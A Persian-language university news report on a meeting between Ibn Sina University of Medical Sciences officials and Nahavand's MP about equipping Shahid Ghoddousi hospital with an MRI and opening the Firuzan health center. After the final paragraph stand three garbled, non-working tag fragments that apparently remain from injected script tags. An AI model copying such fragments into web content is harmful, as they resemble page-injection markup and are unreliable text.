در نشست مسئولان دانشگاه ابن سینا با نماینده مردم نهاوند در مجلس شورای اسلامی مطرح شد

بیمارستان شهید قدوسی نهاوند به زودی مجهز به ام آر ای می شود

نشست مشترک رییس دانشگاه با نماینده مردم شهرستان نهاوند در مجلس شورای اسلامی با موضوع تجهیز بیمارستان شهید قدوسی به ام آر ای و افتتاح به موقع مرکز جامع سلامت شهر فیروزان از توابع شهرستان نهاوند برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، این نشست با حضور دکتر سید حبیب اله موسوی‌بهار رییس دانشگاه علوم پزشکی ابن سینا، دکتر حسن بهرامی نیا نماینده مردم نهاوند در مجلس شورای اسلامی، مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه و مهندس شیرین دخت مدیر حراست دانشگاه انجام شد.

دکتر موسوی‌بهار با ارائه مطالبی از فعالیت دانشگاه در ایام تعطیلات نوروز و هفته سلامت بیان کرد: خدمات درمانی شبانه‌روزی در همه شهرستانهای استان در ایام نوروز تقویت شد و در هفته سلامت حدود ده هزار متر مربع از پروژه های بهداشتی استان افتتاح خواهند شد.

رییس دانشگاه با بیان اینکه بیمارستان شهید قدوسی باید مجهز به ام آر ای شود، ابراز امیدواری کرد و افزود: در تلاش هستیم که بیمارستان شهید قدوسی نهاوند را مجهز به یک دستگاه ام آر ای کنیم که در آینده نزدیک این امر محقق خواهد شد.

نماینده مردم نهاوند در مجلس شورای اسلامی نیز در خصوص تجهیز بیمارستان شهید قدوسی به ام آر ای اظهار کرد: با توجه به کمبود این دستگاه در شهرستان نهاوند در بخش دولتی،اکثر بیماران مورد نیاز این تشخیص به شهرستان های مجاور مراجعه میکنند که بعضا برای خیلی از آنان سخت و دشوار می باشد که اگر این تجهیز به موقع انجام شود بخشی از مشکلات مردم مرتفع خواهد شد.

دکتر حسن بهرامی نیا تاکید کرد که باید در خصوص امکان استخدام کارکنان مورد نیاز بیمارستان شهید قدوسی مکاتبات لازم از طریق معاونت درمان انجام شود زیرا این بیمارستان در حال پیشرفت است و قطعا در آینده با کمبود نیرو مواجه خواهیم بود.

وی با بررسی ساخت و تجهیز به موقع مرکز جامع سلامت شهر فیروزان خاطر‌نشان کرد: این مرکز با توجه به شرایط فیزیکی ساخت و محیطی مناسب، خدمات بهداشتی و درمانی قابل توجهی را به مراجعین ارائه خواهد کرد.

معاون توسعه مدیریت و منابع دانشگاه خلاصه ای از عملکرد حوزه توسعه در خصوص ساخت و تجهیز پروژه های بهداشتی و درمانی شهرستان نهاوند را مطرح و اعلام کرد: با جدیت، همه تلاش خود را بکارگیری میکنیم که بیمارستان شهید قدوسی نهاوند به زودی مجهز به یک دستگاه ام آر ای شود تا مردم شریف شهرستان نهاوند از خدمات درمانی آن بهره مند شود.

وی در خصوص مرکز جامع سلامت شهر فیروزان از توابع شهرستان نهاوند ادامه داد: مرکز جامع سلامت شهر فیروزان نیز به زودی افتتاح و به بهره برداری خواهد رسید و درمانگاه سابق این شهر به آن مرکز منتقل خواهد شد و در خصوص محل زیست پزشکان و کادر درمانی نیز تدابیری اندیشیده شده است که در ماندگاری آنان در این شهر موثر خواهد بودم.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *